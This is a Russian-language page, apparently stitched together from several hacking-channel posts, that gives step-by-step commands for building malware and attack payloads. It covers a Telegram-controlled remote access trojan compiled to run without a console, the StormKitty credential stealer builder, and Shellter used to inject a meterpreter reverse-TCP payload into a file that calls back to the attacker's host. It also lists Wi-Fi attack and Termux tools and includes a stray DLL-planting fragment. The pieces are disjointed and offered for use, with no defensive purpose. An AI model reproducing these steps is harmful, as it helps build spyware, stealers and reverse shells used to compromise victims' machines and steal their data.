
Size: a a a




apt update && apt upgrade
Устанавливаем все необходимые библиотеки:apt install python3 python3-pip
pip3 install pyinstaller
pip3 install pytelegrambotapi opencv-python cryptography
pip3 install comtypes pywin32 pyaudio pillow pycaw
Клонируем инструмент с репозитория GitHub:git clone https://github.com/Bainky/Telegram-RAT
Далее переходим в директорию инструмента:cd Telegram-RAT
Создаем бота в @BotFather. После этого открываем RAT.py через текстовый редактор и вставляем токен и id ранее созданного бота.pyinstaller --onefile --noconsole RAT.py
Почти всё!


pkg update
pkg install tmate -ytmate -F
git clone https://github.com/rajkumardusad/MyServer.git
$ cd MyServer
$ chmod +x install
Запуск:sh install (или ./install)myserver start
Синтаксис:myserver -s localhost 8080 /home/www
Полное руководство вы можете изучить здесь.


version.dll в корневую папку Telegram:



git clone https://github.com/swagkarna/StormKitty
Далее переходим в директорию инструмента:cd StormKitty/StormKitty/builder/StormKittyBuilder
Создаем бота в @BotFather. После этого запускаем Program.cs для создания нашего стиллера.

▫️ apt update && apt upgrade
Устанавливаем все необходимые библиотеки:▫️ dpkg --add-architecture i386
▫️ apt install wine32
Далее устанавливаем инструмент: ▫️ apt install shellter
После того, как процесс установки будет завершен, запускаем инструмент из под Wine. И теперь выполняем следующую команду: -p meterpreter_reverse_tcp --lhost <ip> --port <порт> -p <файл>
В результате работы инструмент внедрит полезную нагрузку в указанный файл, чтобы при запуске данного файла произвести обратное подключение к атакующему хосту ✌️
git clone https://github.com/pulketo/termux-cute-call
$ cd termux-cute-call
$ chmod +x cc.phar
$ ln -s $(pwd)/cc.phar ~/../usr/bin/cc
Использование:pcall {название контакта}
Подробнее про утилиту можете прочитать на официальной странице Github репозитория.
- git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
- cd airgeddon/
Использование:- bash airgeddon.sh — запуск утилиты
